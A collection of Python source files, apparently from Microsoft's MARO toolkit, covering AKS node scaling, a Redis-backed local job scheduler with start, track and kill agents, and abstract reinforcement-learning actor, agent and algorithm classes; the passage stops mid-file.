from maro.cli.k8s.executors.k8s_aks_executor import K8sAksExecutor
from maro.cli.utils.checkers import check_details_validity
from maro.cli.utils.details import load_cluster_details
from maro.cli.utils.lock import lock
from maro.utils.exception.cli_exception import BadRequestError
@check_details_validity
@lock
def scale_node(cluster_name: str, replicas: int, node_size: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "k8s/aks":
executor = K8sAksExecutor(cluster_name=cluster_name)
executor.scale_node(
replicas=replicas,
node_size=node_size
)
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
@check_details_validity
@lock
def list_node(cluster_name: str, **kwargs):
cluster_details = load_cluster_details(cluster_name=cluster_name)
if cluster_details["mode"] == "k8s/aks":
executor = K8sAksExecutor(cluster_name=cluster_name)
executor.list_node()
else:
raise BadRequestError(f"Unsupported command in mode '{cluster_details['mode']}'.")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_pending_ticket()
time.sleep(self.check_interval)
def _check_pending_ticket(self):
# Check pending job ticket
pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
for job_name in pending_jobs:
job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
# Start pending job only if current running job's number less than parallel level.
if int(parallel_level) > running_jobs_length:
self._start_job(job_detail)
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
def _start_job(self, job_details: dict):
command_pid_list = []
for component_type, command_info in job_details["components"].items():
component_number = command_info["num"]
component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
for number in range(component_number):
job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
if not os.path.exists(job_local_path):
os.makedirs(job_local_path)
with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
command_pid = get_child_pid(proc.pid)
command_pid_list.append(command_pid)
self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
self._shutdown_count = 0
self._countdown = self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown")
def run(self):
while True:
self._check_job_status()
time.sleep(self.check_interval)
keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
if not keep_alive:
self._close_agents()
def _check_job_status(self):
running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
for running_job, pid_list in running_jobs.items():
# Check pid status
still_alive = False
for pid in pid_list:
if psutil.pid_exists(pid):
still_alive = True
# Update if no pid exists
if not still_alive:
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)
def _close_agents(self):
if (
not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
):
self._shutdown_count += 1
else:
self._shutdown_count = 0
if self._shutdown_count >= self._countdown:
agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
# close agent
close_by_pid(pid=agent_pid, recursive=True)
# Set agent status to 0
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_kill_ticket()
time.sleep(self.check_interval)
def _check_kill_ticket(self):
# Check pending job ticket
killed_job_names = self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1)
for job_name in killed_job_names:
if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
pid_list = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, job_name))
close_by_pid(pid=pid_list, recursive=False)
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, job_name)
else:
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, job_name)
class MasterAgent:
def __init__(self):
setting_info = load_setting_info()
self.check_interval = setting_info["check_interval"]
self.redis_connection = redis.Redis(
host=setting_info["redis_info"]["host"],
port=setting_info["redis_info"]["port"]
)
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())
def start(self) -> None:
"""Start agents."""
pending_job_agent = PendingJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
pending_job_agent.start()
killed_job_agent = KilledJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
killed_job_agent.start()
job_tracking_agent = JobTrackingAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
job_tracking_agent.start()
if __name__ == "__main__":
master_agent = MasterAgent()
master_agent.start()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import redis
from maro.cli.process.utils.default_param import process_setting
from maro.cli.process.utils.details import load_details, save_setting_info, start_agent, start_redis
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=f"ProcessExecutor.{__name__}")
def create(deployment_path: str, **kwargs):
current_process_path = os.path.expanduser(LocalPaths.MARO_PROCESS)
# Create folder
if not os.path.exists(current_process_path):
os.makedirs(current_process_path)
# Get environment setting
setting_info = process_setting
if deployment_path is not None:
customized_setting = load_details(deployment_path=deployment_path)
for key, value in customized_setting.items():
if key in setting_info:
setting_info[key] = value
save_setting_info(setting_info)
logger.info(f"MARO process mode setting: {setting_info}")
# Start Redis
if setting_info["redis_mode"] == "MARO":
start_redis(port=setting_info["redis_info"]["port"])
logger.info(f"Redis server start with port {setting_info['redis_info']['port']}.")
redis_connection = redis.Redis(host=setting_info["redis_info"]["host"], port=setting_info["redis_info"]["port"])
# Start agents
start_agent()
redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 1)
logger.info("Agents start.")
# Push default setting into Redis
del setting_info["redis_info"]
redis_connection.hmset(ProcessRedisName.SETTING, setting_info)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
import subprocess
import redis
from maro.cli.process.utils.details import close_by_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=f"ProcessExecutor.{__name__}")
def delete(**kwargs):
setting_info = load_setting_info()
# Build connection
redis_connection = redis.Redis(host=setting_info["redis_info"]["host"], port=setting_info["redis_info"]["port"])
# Stop running jobs
running_jobs = redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
if running_jobs:
for job_name, pid_list in running_jobs.items():
pid_list = json.loads(pid_list)
close_by_pid(pid=pid_list, recursive=False)
logger.info(f"Stop running job {job_name.decode()}.")
# Stop Agents
agent_status = int(redis_connection.hget(ProcessRedisName.SETTING, "agent_status"))
if agent_status:
agent_pid = int(redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
close_by_pid(pid=agent_pid, recursive=True)
redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
logger.info("Close agents.")
else:
logger.info("Agents' status is already closed.")
# close Redis
redis_mode = redis_connection.hget(ProcessRedisName.SETTING, "redis_mode").decode()
if redis_mode == "MARO":
get_redis_pid_command = f"pidof 'redis-server *:{setting_info['redis_info']['port']}'"
get_redis_pid_process = subprocess.Popen(get_redis_pid_command, shell=True, stdout=subprocess.PIPE)
redis_pid = int(get_redis_pid_process.stdout.read())
get_redis_pid_process.wait()
close_by_pid(pid=redis_pid, recursive=False)
logger.info(f"Close Redis server with port {setting_info['redis_info']['port']}")
else:
logger.info(f"MARO does not close Redis server with mode {redis_mode}.")
# Rm process environment setting
os.remove(os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import copy
import json
import os
import shutil
from maro.cli.process.utils.details import env_prepare, load_details
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class ProcessExecutor:
def __init__(self):
self.redis_connection = env_prepare()
def start_job(self, deployment_path: str):
job_details = load_details(deployment_path)
self._push_pending_job(job_details)
def _push_pending_job(self, job_details: dict):
job_name = job_details["name"]
# Push job details to redis
self.redis_connection.hset(
ProcessRedisName.JOB_DETAILS,
job_name,
json.dumps(job_details)
)
# Push job name to pending_job_tickets
self.redis_connection.lpush(
ProcessRedisName.PENDING_JOB_TICKETS,
job_name
)
logger.info(f"Sending {job_name} into pending job tickets.")
def stop_job(self, job_name: str):
if not self.redis_connection.hexists(ProcessRedisName.JOB_DETAILS, job_name):
logger.error(f"No such job '{job_name}' in Redis.")
return
# push job_name into kill_job_tickets
self.redis_connection.lpush(
ProcessRedisName.KILLED_JOB_TICKETS,
job_name
)
logger.info(f"Sending {job_name} into killed job tickets.")
def delete_job(self, job_name: str):
# Stop job for running and pending job.
self.stop_job(job_name)
# Rm job details in Redis
self.redis_connection.hdel(ProcessRedisName.JOB_DETAILS, job_name)
# Rm job's log folder
job_folder = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_name}")
shutil.rmtree(job_folder, True)
logger.info(f"Remove local temporary log folder {job_folder}.")
def get_job_logs(self, job_name):
source_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_name}")
if not os.path.exists(source_path):
logger.error(f"Cannot find the logs of {job_name}.")
destination = os.path.join(os.getcwd(), job_name)
if os.path.exists(destination):
shutil.rmtree(destination)
shutil.copytree(source_path, destination)
logger.info(f"Dump logs in path: {destination}.")
def list_job(self):
# Get all jobs
jobs = self.redis_connection.hgetall(ProcessRedisName.JOB_DETAILS)
for job_name, job_details in jobs.items():
job_name = job_name.decode()
job_details = json.loads(job_details)
if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
job_details["job_status"] = "running"
else:
pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
pending_jobs = [job_name.decode() for job_name in pending_jobs]
job_details["job_status"] = "pending" if job_name in pending_jobs else "finish"
logger.info(job_details)
def start_schedule(self, deployment_path: str):
schedule_detail = load_details(deployment_path)
# push schedule details to Redis
self.redis_connection.hset(
ProcessRedisName.JOB_DETAILS,
schedule_detail["name"],
json.dumps(schedule_detail)
)
job_list = schedule_detail["job_names"]
# switch schedule details into job details
job_detail = copy.deepcopy(schedule_detail)
del job_detail["job_names"]
for job_name in job_list:
job_detail["name"] = job_name
self._push_pending_job(job_detail)
def stop_schedule(self, schedule_name: str):
if self.redis_connection.hexists(ProcessRedisName.JOB_DETAILS, schedule_name):
schedule_details = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, schedule_name))
else:
logger.error(f"Cannot find {schedule_name} in Redis. Please check schedule name.")
return
job_list = schedule_details["job_names"]
for job_name in job_list:
self.stop_job(job_name)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import signal
import subprocess
from typing import Union
import psutil
import redis
import yaml
from maro.cli.utils.params import LocalPaths, ProcessRedisName
from maro.utils.exception.cli_exception import ProcessInternalError
def load_details(deployment_path: str = None):
try:
with open(deployment_path, "r") as cf:
details = yaml.safe_load(cf)
except Exception as e:
raise ProcessInternalError(f"Failure to find job details, cause by {e}")
return details
def load_setting_info():
try:
with open(os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING), "r") as rf:
redis_info = yaml.safe_load(rf)
except Exception as e:
raise ProcessInternalError(
f"Failure to load setting information, cause by {e}"
f"Please run maro process setup, before any process commands."
)
return redis_info
def save_setting_info(setting_info):
with open(os.path.expanduser(LocalPaths.MARO_PROCESS_SETTING), "w") as wf:
yaml.safe_dump(setting_info, wf)
def env_prepare():
"""Need Redis ready and master agent start."""
setting_info = load_setting_info()
redis_connection = redis.Redis(host=setting_info["redis_info"]["host"], port=setting_info["redis_info"]["port"])
agent_status = int(redis_connection.hget(ProcessRedisName.SETTING, "agent_status"))
if not agent_status:
start_agent()
redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 1)
return redis_connection
def start_agent():
# start job_agent.py
command = f"python {LocalPaths.MARO_PROCESS_AGENT}"
_ = subprocess.Popen(command, shell=True)
def start_redis(port: int):
# start Redis for maro
redis_process = subprocess.Popen(
["redis-server", "--port", str(port), "--daemonize yes"]
)
redis_process.wait(timeout=2)
def close_by_pid(pid: Union[int, list], recursive: bool = False):
if isinstance(pid, int):
if not psutil.pid_exists(pid):
return
if recursive:
current_process = psutil.Process(pid)
children_process = current_process.children(recursive=False)
# May launch by JobTrackingAgent which is child process, so need close parent process first.
current_process.kill()
for child_process in children_process:
child_process.kill()
else:
os.kill(pid, signal.SIGKILL)
else:
for p in pid:
if psutil.pid_exists(p):
os.kill(p, signal.SIGKILL)
def get_child_pid(parent_pid):
command = f"ps -o pid --ppid {parent_pid} --noheaders"
get_children_pid_process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
children_pids = get_children_pid_process.stdout.read()
get_children_pid_process.wait(timeout=2)
# Convert into list or int
try:
children_pids = int(children_pids)
except ValueError:
children_pids = children_pids.decode().split("\n")
children_pids = [int(pid) for pid in children_pids[:-1]]
return children_pids
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import logging
import os
class GlobalParams:
PARALLELS = 5
LOG_LEVEL = logging.INFO
DEFAULT_REDIS_PORT = 6379
DEFAULT_FLUENTD_PORT = 24224
DEFAULT_SSH_PORT = 22
class GlobalPaths:
MARO_LIB = "~/.maro/lib"
MARO_GRASS_LIB = "~/.maro/lib/grass"
MARO_K8S_LIB = "~/.maro/lib/k8s"
MARO_CLUSTERS = "~/.maro/clusters"
MARO_DATA = "~/.maro/data"
MARO_TEST = "~/.maro/test"
MARO_LOCAL_TMP = "~/.maro-local/tmp"
ABS_MARO_LIB = os.path.expanduser(MARO_LIB)
ABS_MARO_GRASS_LIB = os.path.expanduser(MARO_GRASS_LIB)
ABS_MARO_K8S_LIB = os.path.expanduser(MARO_K8S_LIB)
ABS_MARO_CLUSTERS = os.path.expanduser(MARO_CLUSTERS)
ABS_MARO_DATA = os.path.expanduser(MARO_DATA)
ABS_MARO_TEST = os.path.expanduser(MARO_TEST)
ABS_MARO_LOCAL_TMP = os.path.expanduser(MARO_LOCAL_TMP)
class LocalPaths:
"""Only use by maro process cli"""
MARO_PROCESS = "~/.maro/process"
MARO_PROCESS_SETTING = "~/.maro/process/setting.yml"
MARO_PROCESS_AGENT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../process/agent/job_agent.py")
MARO_PROCESS_DEPLOYMENT = os.path.join(os.path.dirname(os.path.abspath(__file__)), "../process/deployment")
class ProcessRedisName:
"""Record Redis elements name, and only for maro process"""
PENDING_JOB_TICKETS = "process:pending_job_tickets"
KILLED_JOB_TICKETS = "process:killed_job_tickets"
JOB_DETAILS = "process:job_details"
RUNNING_JOB = "process:running_job"
SETTING = "process:setting"
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.rl.actor import AbsActor, SimpleActor
from maro.rl.agent import AbsAgent, AbsAgentManager, AgentManagerMode, SimpleAgentManager
from maro.rl.algorithms import (
DQN, AbsAlgorithm, ActionInfo, ActorCritic, ActorCriticConfig, DQNConfig, PolicyGradient, PolicyOptimization,
PolicyOptimizationConfig
)
from maro.rl.dist_topologies import (
ActorProxy, ActorWorker, concat_experiences_by_agent, merge_experiences_with_trajectory_boundaries
)
from maro.rl.exploration import (
AbsExplorer, EpsilonGreedyExplorer, GaussianNoiseExplorer, NoiseExplorer, UniformNoiseExplorer
)
from maro.rl.learner import AbsLearner, SimpleLearner
from maro.rl.models import AbsBlock, FullyConnectedBlock, LearningModel, NNStack, OptimizerOptions
from maro.rl.scheduling import LinearParameterScheduler, Scheduler, TwoPhaseLinearParameterScheduler
from maro.rl.shaping import AbsShaper, ActionShaper, ExperienceShaper, KStepExperienceShaper, StateShaper
from maro.rl.storage import AbsStore, ColumnBasedStore, OverwriteType
__all__ = [
"AbsActor", "SimpleActor",
"AbsAgent", "AbsAgentManager", "AgentManagerMode", "SimpleAgentManager",
"AbsAlgorithm", "ActionInfo", "ActorCritic", "ActorCriticConfig", "DQN", "DQNConfig", "PolicyGradient",
"PolicyOptimization", "PolicyOptimizationConfig",
"ActorProxy", "ActorWorker", "concat_experiences_by_agent", "merge_experiences_with_trajectory_boundaries",
"AbsExplorer", "EpsilonGreedyExplorer", "GaussianNoiseExplorer", "NoiseExplorer", "UniformNoiseExplorer",
"AbsLearner", "SimpleLearner",
"AbsBlock", "FullyConnectedBlock", "LearningModel", "NNStack", "OptimizerOptions",
"LinearParameterScheduler", "Scheduler", "TwoPhaseLinearParameterScheduler",
"AbsShaper", "ActionShaper", "ExperienceShaper", "KStepExperienceShaper", "StateShaper",
"AbsStore", "ColumnBasedStore", "OverwriteType"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_actor import AbsActor
from .simple_actor import SimpleActor
__all__ = ["AbsActor", "SimpleActor"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.rl.agent.simple_agent_manager import SimpleAgentManager
from maro.simulator import Env
from .abs_actor import AbsActor
class SimpleActor(AbsActor):
"""A simple ``AbsActor`` implementation.
Args:
env (Env): An Env instance.
agent_manager (SimpleAgentManager): An AgentManager instance that manages all agents.
"""
def __init__(self, env: Env, agent_manager: SimpleAgentManager):
super().__init__(env, agent_manager)
def roll_out(
self, model_dict: dict = None, exploration_params=None, done: bool = False, return_details: bool = True
):
"""Perform one episode of roll-out and return performance and experiences.
Args:
model_dict (dict): If not None, the agents will load the models from model_dict and use these models
to perform roll-out.
exploration_params: Exploration parameters.
done (bool): If True, the current call is the last call, i.e., no more roll-outs will be performed.
This flag is used to signal remote actor workers to exit.
return_details (bool): If True, return experiences as well as performance metrics provided by the env.
Returns:
Performance and relevant details from the episode (e.g., experiences).
"""
if done:
return None, None
self._env.reset()
# load models
if model_dict is not None:
self._agents.load_models(model_dict)
# load exploration parameters:
if exploration_params is not None:
self._agents.set_exploration_params(exploration_params)
metrics, decision_event, is_done = self._env.step(None)
while not is_done:
action = self._agents.choose_action(decision_event, self._env.snapshot_list)
metrics, decision_event, is_done = self._env.step(action)
self._agents.on_env_feedback(metrics)
details = self._agents.post_process(self._env.snapshot_list) if return_details else None
return self._env.metrics, details
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_agent import AbsAgent
from .abs_agent_manager import AbsAgentManager, AgentManagerMode
from .simple_agent_manager import SimpleAgentManager
__all__ = ["AbsAgent", "AbsAgentManager", "AgentManagerMode", "SimpleAgentManager"]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from abc import ABC, abstractmethod
from maro.rl.algorithms.abs_algorithm import AbsAlgorithm
from maro.rl.storage.abs_store import AbsStore
class AbsAgent(ABC):
"""Abstract RL agent class.
It's a sandbox for the RL algorithm. Scenario-specific details will be excluded.
We focus on the abstraction algorithm development here. Environment observation and decision events will
be converted to a uniform format before calling in. And the output will be converted to an environment
executable format before return back to the environment. Its key responsibility is optimizing policy based
on interaction with the environment.
Args:
name (str): Agent's name.
algorithm (AbsAlgorithm): A concrete algorithm instance that inherits from AbstractAlgorithm.
This is the centerpiece of the Agent class and is responsible for the most important tasks of an agent:
choosing actions and optimizing models.
experience_pool (AbsStore): It is used to store experiences processed by the experience shaper, which will be
used by some value-based algorithms, such as DQN. Defaults to None.
"""
def __init__(
self,
name: str,
algorithm: AbsAlgorithm,
experience_pool: AbsStore = None
):
self._name = name
self._algorithm = algorithm
self._experience_pool = experience_pool
@property
def algorithm(self):
"""Underlying algorithm employed by the agent."""
return self._algorithm
@property
def experience_pool(self):
"""Underlying experience pool where the agent stores experiences."""
return self._experience_pool
def choose_action(self, model_state):
"""Choose an action using the underlying algorithm based on a preprocessed env state.
Args:
model_state: State vector as accepted by the underlying algorithm.
Returns:
If the agent's explorer is None, the action given by the underlying model is returned. Otherwise,
an exploratory action is returned.
"""
return self._algorithm.choose_action(model_state)
def set_exploration_params(self, **params):
self._algorithm.set_exploration_params(**params)
@abstractmethod
def train(self, *args, **kwargs):
"""Training logic to be implemented by the user.
For example, this may include drawing samples from the experience pool and the algorithm training on
these samples.
"""
return NotImplementedError
def store_experiences(self, experiences):
"""Store new experiences in the experience pool."""
if self._experience_pool is not None:
self._experience_pool.put(experiences)
def load_model(self, model):
"""Load models from memory."""
self._algorithm.model.load(model)
def dump_model(self):
"""Return the algorithm's trainable models."""
return self._algorithm.model.dump()
def load_model_from_file(self, dir_path: str):
"""Load trainable models from disk.
Load trainable models from the specified directory. The model file is always prefixed with the agent's name.
Args:
dir_path (str): path to the directory where the models are saved.
"""
self._algorithm.model.load_from_file(os.path.join(dir_path, self._name))
def dump_model_to_file(self, dir_path: str):
"""Dump the algorithm's trainable models to disk.
Dump trainable models to the specified directory. The model file is always prefixed with the agent's name.
Args:
dir_path (str): path to the directory where the models are saved.
"""
self._algorithm.model.dump_to_file(os.path.join(dir_path, self._name))
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
from enum import Enum
from maro.rl.shaping.action_shaper import ActionShaper
from maro.rl.shaping.experience_shaper import ExperienceShaper
from maro.rl.shaping.state_shaper import StateShaper
from maro.utils.exception.rl_toolkit_exception import AgentManagerModeError
class AgentManagerMode(Enum):
TRAIN = "train"
INFERENCE = "inference"
TRAIN_INFERENCE = "train_inference"
class AbsAgentManager(ABC):
"""Abstract agent manager class.
The agent manager provides a unified interactive interface with the environment for RL agent(s). From
the actor’s perspective, it isolates the complex dependencies of the various homogeneous/heterogeneous
agents, so that the whole agent manager will behave just like a single agent.
Args:
name (str): Name of agent manager.
mode (AgentManagerMode): An ``AgentManagerNode`` enum member that indicates the role of the agent manager
in the current process.
agent_dict (dict): A dictionary of agents to be wrapper by the agent manager.
state_shaper (StateShaper, optional): It is responsible for converting the environment observation to model
input.
action_shaper (ActionShaper, optional): It is responsible for converting an agent's model output to environment
executable action. Cannot be None under Inference and TrainInference modes.
experience_shaper (ExperienceShaper, optional): It is responsible for processing data in the replay buffer at
the end of an episode.
"""
def __init__(
self,
name: str,
mode: AgentManagerMode,
agent_dict: dict,
state_shaper: StateShaper = None,
action_shaper: ActionShaper = None,
experience_shaper: ExperienceShaper = None
):
self._name = name
self._mode = mode
self.agent_dict = agent_dict
self._state_shaper = state_shaper
self._action_shaper = action_shaper
self._experience_shaper = experience_shaper
def __getitem__(self, agent_id):
return self.agent_dict[agent_id]
@property
def name(self):
"""Agent manager's name."""
return self._name
@abstractmethod
def choose_action(self, *args, **kwargs):
"""Generate an environment executable action given the current decision event and snapshot list.
"""
return NotImplemented
@abstractmethod
def on_env_feedback(self, *args, **kwargs):
"""Processing logic after receiving feedback from the environment is implemented here.
See ``SimpleAgentManager`` for example.
"""
return NotImplemented
@abstractmethod
def post_process(self, *args, **kwargs):
"""Processing logic after an episode is finished.
These things may involve generating experiences and resetting stateful objects. See ``SimpleAgentManager``
for example.
"""
return NotImplemented
@abstractmethod
def train(self, experience_by_agent: dict):
"""Train the agents."""
return NotImplemented
def set_exploration_params(self, params):
# Per-agent exploration parameters
if isinstance(params, dict) and params.keys() <= self.agent_dict.keys():
for agent_id, params in params.items():
self.agent_dict[agent_id].set_exploration_params(**params)
# Shared exploration parameters for all agents
else:
for agent in self.agent_dict.values():
agent.set_exploration_params(**params)
def _assert_train_mode(self):
if self._mode != AgentManagerMode.TRAIN and self._mode != AgentManagerMode.TRAIN_INFERENCE:
raise AgentManagerModeError(msg=f"this method is unavailable under mode {self._mode}")
def _assert_inference_mode(self):
if self._mode != AgentManagerMode.INFERENCE and self._mode != AgentManagerMode.TRAIN_INFERENCE:
raise AgentManagerModeError(msg=f"this method is unavailable under mode {self._mode}")
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
from abc import abstractmethod
from maro.rl.algorithms.policy_optimization import ActionInfo
from maro.rl.shaping.action_shaper import ActionShaper
from maro.rl.shaping.experience_shaper import ExperienceShaper
from maro.rl.shaping.state_shaper import StateShaper
from maro.rl.storage.column_based_store import ColumnBasedStore
from maro.utils.exception.rl_toolkit_exception import MissingShaper
from .abs_agent_manager import AbsAgentManager, AgentManagerMode
class SimpleAgentManager(AbsAgentManager):
def __init__(
self,
name: str,
mode: AgentManagerMode,
agent_dict: dict,
state_shaper: StateShaper = None,
action_shaper: ActionShaper = None,
experience_shaper: ExperienceShaper = None
):
if mode in {AgentManagerMode.INFERENCE, AgentManagerMode.TRAIN_INFERENCE}:
if state_shaper is None:
raise MissingShaper(msg=f"state shaper cannot be None under mode {self._mode}")
if action_shaper is None:
raise MissingShaper(msg=f"action_shaper cannot be None under mode {self._mode}")
if experience_shaper is None:
raise MissingShaper(msg=f"experience_shaper cannot be None under mode {self._mode}")
super().__init__(
name, mode, agent_dict,
state_shaper=state_shaper,
action_shaper=action_shaper,
experience_shaper=experience_shaper
)
# Data structures to temporarily store transitions and trajectory
self._transition_cache = {}
self._trajectory = ColumnBasedStore()
def choose_action(self, decision_event, snapshot_list):
self._assert_inference_mode()
agent_id, model_state = self._state_shaper(decision_event, snapshot_list)
action_info = self.agent_dict[agent_id].choose_action(model_state)
self._transition_cache = {
"state": model_state,
"reward": None,
"agent_id": agent_id,
"event": decision_event
}
if isinstance(action_info, ActionInfo):
self._transition_cache["action"] = action_info.action
self._transition_cache["log_action_probability"] = action_info.log_probability
else:
self._transition_cache["action"] = action_info
return self._action_shaper(self._transition_cache["action"], decision_event, snapshot_list)
def on_env_feedback(self, metrics):
"""This method records the environment-generated metrics as part of the latest transition in the trajectory.
Args:
metrics: business metrics provided by the environment after an action has been executed.
"""
self._transition_cache["metrics"] = metrics
self._trajectory.put(self._transition_cache)
def post_process(self, snapshot_list):
"""This method processes the latest trajectory into experiences.
Args:
snapshot_list: the snapshot list from the env at the end of an episode.
"""
experiences = self._experience_shaper(self._trajectory, snapshot_list)
self._trajectory.clear()
self._transition_cache = {}
self._state_shaper.reset()
self._action_shaper.reset()
self._experience_shaper.reset()
return experiences
@abstractmethod
def train(self, experiences_by_agent: dict):
"""Train all agents."""
return NotImplementedError
def load_models(self, agent_model_dict):
"""Load models from memory for each agent."""
for agent_id, models in agent_model_dict.items():
self.agent_dict[agent_id].load_model(models)
def dump_models(self) -> dict:
"""Get agents' underlying models.
This is usually used in distributed mode where models need to be broadcast to remote roll-out actors.
"""
return {agent_id: agent.dump_model() for agent_id, agent in self.agent_dict.items()}
def load_models_from_files(self, dir_path):
"""Load models from disk for each agent."""
for agent in self.agent_dict.values():
agent.load_model_from_file(dir_path)
def dump_models_to_files(self, dir_path: str):
"""Dump agents' models to disk.
Each agent will use its own name to create a separate file under ``dir_path`` for dumping.
"""
os.makedirs(dir_path, exist_ok=True)
for agent in self.agent_dict.values():
agent.dump_model_to_file(dir_path)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .abs_algorithm import AbsAlgorithm
from .dqn import DQN, DQNConfig
from .policy_optimization import (
ActionInfo, ActorCritic, ActorCriticConfig, PolicyGradient, PolicyOptimization, PolicyOptimizationConfig
)
__all__ = [
"AbsAlgorithm",
"DQN", "DQNConfig",
"ActionInfo", "ActorCritic", "ActorCriticConfig", "PolicyGradient", "PolicyOptimization",
"PolicyOptimizationConfig"
]
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from abc import ABC, abstractmethod
import torch
from maro.rl.models.learning_model import LearningModel
from maro.utils.exception.rl_toolkit_exception import UnrecognizedTask
class AbsAlgorithm(ABC):
"""Abstract RL algorithm class.
The class provides uniform policy interfaces such as ``choose_action`` and ``train``. We also provide some
predefined RL algorithm based on it, such DQN, A2C, etc. User can inherit from it to customize their own
algorithms.
Args:
model (LearningModel): Task model or container of task models required by the algorithm.
config: Settings for the algorithm.
"""
def __init__(self, model: LearningModel, config):
self._device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self._model = model.to(self._device)
self._config = config
@property
def model(self):
return self._model
@abstractmethod
def choose_action(self, state):
"""This method uses the underlying model(s) to compute an action from a shaped state.
Args:
state: A state object shaped by a ``StateShaper`` to conform to the model input format.
Returns:
The action to be taken given ``state``. It is usually necessary to use an ``ActionShaper`` to convert
this to an environment executable action.
"""
return NotImplementedError
@abstractmethod
def train(self, *args, **kwargs):
"""Train models using samples.
This method is algorithm-specific and needs to be implemented by the user. For example, for the DQN
algorithm, this may look like train(self, state_batch, action_batch, reward_batch, next_state_batch).
"""
return NotImplementedError
def set_exploration_params(self, **params):
pass
@staticmethod
